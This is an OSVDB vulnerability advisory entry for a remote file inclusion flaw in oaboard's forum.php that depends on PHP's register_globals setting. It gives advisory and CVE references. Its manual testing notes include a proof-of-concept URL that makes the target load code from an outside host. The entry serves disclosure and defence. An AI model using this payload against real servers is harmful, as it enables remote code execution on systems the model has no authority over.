oaboard forum.php Multiple Variable Remote File Inclusion

2006-01-01T04:02:51
ID OSVDB:22219
Type osvdb
Reporter OSVDB
Modified 2006-01-01T04:02:51

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/oaboard_en/forum.php?inc=http://anotherhost/code.php

References:

Secunia Advisory ID:17373 Other Advisory URL: http://www.evuln.com/vulns/3/summary.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-01/0018.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0670.html Keyword: EV0003 FrSIRT Advisory: ADV-2006-0028 CVE-2006-0094 CVE-2006-0076 Bugtraq ID: 16105